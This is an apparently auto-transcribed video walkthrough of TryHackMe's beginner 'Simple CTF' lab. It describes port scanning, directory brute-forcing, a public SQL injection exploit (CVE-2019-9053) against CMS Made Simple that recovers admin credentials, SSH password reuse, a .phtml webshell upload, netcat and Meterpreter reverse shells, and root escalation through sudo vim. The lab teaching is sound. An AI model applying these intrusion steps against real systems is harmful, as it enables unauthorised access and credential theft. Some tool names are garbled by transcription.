What's going on? Welcome back. In today's video, we're back to TryHackMe with a new video. In this video, we're going to go over simple CTF, which is a beginner level CTF. As you can see, we have here the questions. We're going to answer them as we step through the challenge. Now, as you can see here, if we go to write-ups, there are many write-ups, as you can see, because it's easy, beginner level, but we're going to try to do this challenge in a different way. And this is the scoreboard. As you can see, I'm at the bottom. I haven't done the challenge before. 0 points. All right. So the IMAP scan. IMAP scan revealed we have 1, 2, 3 open ports. And as you can see, the SSH is running on port 2222, which is something unique. Now, as you can see in the FTP directory, it's saying that there is anonymous access allowed, which encourages me to start enumerating the FTP. So, new tab. All right, FTP and 10.10.186.154. Anonymous as username. Login is successful. ls. So we have PUP FTP. All right. PWD. Oh, I can't execute this. Right. So as you can see, I don't think there is something we can take away from this access. So basically, we can switch now to the HTTP server. So quit, clear, on to the browser. So 10.10. This is the default Apache web page. So as mentioned earlier in the previous videos, whenever we encounter a page that we can't take anything from it, right? So we're gonna do directory search in an attempt to find hidden directories in the page. So sudo go buster dir. So this is the command ready. Let's change only the IP address, which is 186.154.186.154. Seems like medium will not retrieve anything meaningful for us, so we're going to switch to common directory buster dirb. All right, and then we have word list common user share dirb. All right, so we have to omit the word list from here. Okay, so index.html, which is a default page. Robots.txt simple. Let's check them out. Robots. So the robot file shows that it disallows the search engine specifically and allows anything else. All right, so nothing meaningful in here. Let's check out the simple server status. No, it's simple according to the response code. So go to simple. And it is a CMS Made Simple, which is content management made simple, one of the content management systems. uh, types you would encounter. Much like WordPress, right? It's CMS at the end. So basically, whenever we say CMS, we have many options to play with. The first option is to find the version of this. As you can see, it's saying the site is powered by CMS Made Simple. The version is 228. So we have the first lead on this web application, which is finding if the version is vulnerable, and so we can find a matching exploit. Sudo search exploit SW CMS Made Simple. All right, so the version is 228. 228. All right, so everything that starts at 228 and onwards can be applied on this version of CMS, right? Because as you can see, these are exploits for more recent versions, and they definitely apply on this one, which is older. That's the logic on this. So 2214, arbitrary file upload, authenticated arbitrary file upload. So as you can see, we can't use these exploits because they require authentication. And currently, we don't have a valid set of credentials. So we can't authenticate with a CMS. Therefore, we cannot use these exploits. Authenticated, stored, authenticated. All of them are authenticated, as you can see, except 2210, SQL injection. Let's check this out. So what do we do here? Um, -m. I couldn't remember the. Okay, with this, yes. So SQL injection. Let's take the path. Exploit, and just find out more about this. All right, it is saved to the simple CTF directory, ls cat or nano 46. So it is a Python exploit, and the title is unauthenticated. It doesn't require you to log in. SQL injection on CMS Made Simple less than or equal to 229, and here 228, which is perfect. Version, and this is the CVE number, 2019-9053. Always, it is better to read the cause and the root cause of the vulnerability before diving in the exploit. So let's go to Google and Google this exploit, this vulnerability. See why this vulnerability happened in the first place. What was the weakness? An issue was discovered in CMS Made Simple 228. It is possible with the news module, which is, let's see the news module here. Go up. Nope. Since we are not authenticated, I don't think we can view the details of every model. So let's continue. So it's possible with the news model through a crafted URL to achieve unauthenticated blind time-based SQL injection via the M1 ID list parameter. Okay, so it is the kind of application vulnerability in the CMS. Let's see here. And this is an announcement. Cancel. What is that? Yes. So this is the official bulleted list from the CMS Made Simple. As you can see, today we are announcing the release of CMS Made Simple 2.10. This is a security and stability release. We have fixed some relatively important security vulnerabilities and fixed some long-standing issues. So more specifically, a SQL injection vulnerability in the default action was fixed. This is the primary critical reason for the release. The module manager received some bug fixes when installing a module that had numerous dependencies and a minor object insertion vulnerability. A couple of minor authenticated security vulnerabilities were fixed in the core and the file picker module. Additionally, some minor fixes to the file cache driver and IP address detection. Okay, seems like the only details we have about this vulnerability is what we saw now. And this is the exploit. Let's see the package storm security. This is the exploit code, by the way. CMS Made Simple version prior to 2.10 suffered from a remote SQL injection vulnerability. All right, let's now read through the exploit, see how it works. Okay, so these are the Python models needed for the exploit to work. And here, as you can see, takes input from the user. We have the URL as illustrated here. And of course, as you can see, there is a /CMS, which means that some URLs have the CMS installed in a subdirectory like this one. But in our case, it is installed in the simple directory. Okay, fine. So base target URL. And we have the word list for cracking the admin password. Okay, and here this -- word list option, -- crack, help crack password with word list. Okay, so we have to supply this option, right? And then supply the word list and the base URL, of course. Let's go down, see more options. Specify a URL to the target. So example user is exploit.py-u target URL, or this is no cracking without cracking the password. With the cracking the password, we have to specify the URL, -- crack, -w, and the word list path. Set up the variable time with an appropriate time because the SQL injection is time-based. So you have to set the time variable. Okay, dictionary, true. Let's go down. So the result of this is plain text set of credentials, the username and the password found, password. And it takes this directly from the, as you can see here, there is no hash. Well, there is hash, I guess. Let's go up. As you can see, hash library is used. Dump email, the email, as you can see, and print. Okay, so it's time to launch the exploit, I guess. So sudo node. Okay, now we launch the exploit. Sudo Python. Is it Python 3 or I couldn't pay attention to this? This is not Python 3. All right, sudo Python 4 -u URL, which is here. -- crack -w user. So we have a missing module. Sudo pip install term color. Okay, let's run this now. Now, as you can see here, when I run this tool for the second attempt, the salt has been found, the username has been found, the email, and this is the hash of the password. For some reason, the password couldn't be cracked, but I'm going to tell you the password because I have tried this before. The password is secret. So we're going to now log in to the web page, but let's see where is the login page here. Writeup admin. Okay, the username is Mitch. The password is secret. And as you can see, we are now logged into the CMS panel. Now, as we are logged in, we can now try the authenticated exploits. So search exploit -w CMS Made Simple. Now, all of the exploits starting from 2 to 14 all the way till 2 to here, they can be applied, right? So we have arbitrary file upload. We can upload reverse shell, and here, as you can see, authenticated arbitrary file upload, RCE authenticated. So we can try all of these, but we're gonna first try the credentials against the SSH server. So left h -p2222 and username is Mitch at the IP and 10.186.154. And password is secret. So as you can see, we have found out that the password we have found from exploiting the web application is valid to be used against the SSH server. So we have here password reuse. So ID Mitch. Now the last step is the privilege escalation. Now before conducting the privilege escalation here, how about if the password didn't work on the SSH server? So we have to stick or find a way to try these exploits. So because we are logged in here, we can just see how we can use these exploits. So let's grab let's see here. So RCE authenticated to 215. -m cat 493. So the vulnerability is present at edit user tag at line 93, where the user input is in eval function. The steps to reproduce are login as administrator user and navigate to extensions, user-defined tags. So extensions, user-defined tags, user-defined tags. Okay. Add code with the payload of this netcat reversal. Click on the newly created user-defined tag and use the run function. RCE will be achieved. So let's say nc-lvp4545 and take the code here. Go to extensions, add the code. What is that? Delete, edit user-defined tag. We don't have add code. Add code with the payload. So maybe we have to add user-defined tag. Let's see. Okay, code. And here is test. Don't forget to put the IP of your machine. Hit config. And change this. 4.5. All right. Now what else? Submit. All right, so here we have the delete, we have edit. Okay, let's see what is the next step. And then click on the newly created user-defined tag and use the run function. Let's see if the user Mitch has the ability to use the run function. Since we are not admin user, there might be a possibility that we can't use the run function. Test, run. Let's see here. Let's check. Nothing. So RC is not achieved on this. 4545, 10, 8, 149. So, the work. IP is right. Let's try for the last time. Run. Oh, it didn't work. All right. Let's see what else we have. So we have RC. We tried this one. Didn't work. Cross-site scripting. We are not interested in cross-site scripting. Authenticated arbitrary file upload. Let's check on this one. So cat 487. So let's see here. CMS Made Simple 2240 allows authenticated arbitrary file upload because the file manager does not block .ptar and .phtml files. A malicious user can perform remote code execution proof of concept, create phtml or ptar file with malicious PHP payload, upload it, and click on the uploaded file to perform RCE. Example RCE is this. Perp request, CMS upload RCE, PHTML. So if you go to File Manager, User Management, Event Manager, Content, File Manager. All right. So we have to upload some file with PHTML extension. And then we browse the file like this, uploads the CMD equal to ID. So let's try with this one as an example. So sudo POC test.phtml. Paste this one, save, and we upload this one. Let's see here, browse, TryHackMe. So it has been uploaded. Let's now navigate to simple uploads POC test p.html. Check on that. So the path is correct. Now we type the ID. CMD, the command to be executed is ID, for example. And it worked. So this exploit worked. Fine. So now let's establish netcat connection to our machine nc-lvp 4555. And the command to be executed here is nc plus plus 4545 plus dash e plus bin dash. Let's check on that. Nope. I think there is no netcat on the machine. ls. Yes. Okay, so now let's generate a malicious PHP payload with MSF Venom, sudo MSF Venom This one is okay, but we have to change the IP. Okay, let me say cancel. So we take this one and we edit the existing content of the payload we have just uploaded. So this is the file. Can we edit this file? Edit, no edit. All right, leave it. So use exploit multi handler payload stream okay. Let me split this like that. Sudo nano exp.phml and paste the content of the payload here. Okay, up here, configure the options of the exploit, listener, report, 5, run. All right, now let's upload this one. Upload. Okay, navigate. No, PHTML. Let's see here. Oh, okay. So we have one listener, one shell opened with this command shell, by the way. ID. Oh, closed. What was the reason for this? Run. Session 2 closed. Interpreter reverses meterpreter. No, the payload is wrong. Set payload PHP interpreter reverse TCP. Run. Okay, so we have now two methods to exploit. You can either exploit the vulnerability in CMS, or you can use the password reuse from the SQL injection vulnerability. Now we can either choose with the interpreter shell, or we can choose with the SSH one. So preferably, I'm going to proceed with the SSH. Now we see sudo-l. What we can do with user Mitch, we can run vim, right, as root user with no password. That's why we're going to head to GTF pins, GTF pins, vim, sudo. So we can take this as it is and just paste. ID. So this is the root user. Let's see on the left, yes, ID, get your ID, run this here. Oh, we have to drop the shell now. Help. Okay, execute. Specify a file. Oh, we have to specify a file. Anyway, we can drop the shell from the interpreter and perform the exploit. no TTY present and no ask pass program specified. So we'll have to import Python TTY, Python import. Okay. Password for data. Ah, we are data here. I forgot this. So here you are data, right? You will have to escalate to Mitch. So we can type su Mitch secret, and you are Mitch now. Execute the command, and you are the root. So you have two root users here. Okay, so the questions. How many services are running under port 1000? Is this real? Let me check back in map scan. 1000. We haven't found 1000 port. It's weird. 1000. Let me check the question again. Maybe I misunderstood the question. How many servers are running under port 1000? So we have two. What is running on higher port? On port 2222, it was SH. What is the CVE you are using against the application? So at the first we used, no, what's happening here? Why is it closing? Okay. We used the CVE number. Let's check back. That's nano 466. CVE 2019-9053. What kind of vulnerability is the application vulnerable? And you can use user share 6 password command to crack the pass. SQL injection, right? SQL I. What is the password? Secret. But where can you log in with the details obtained? CMS. Wrong. Where can you log in with the details obtained? SSH, right? We use it in the SSH server. SSH, password reuse. What is user flag? Let's find user flag. ls cat user txt. Is there any other user in the home directory? What is its name? cd home ls some path. Cool. Some path. What can you leverage to spawn a privileged shell? VIM. What is the root flag? Cat cd root. Cat root.txt. So it's done. There you have it.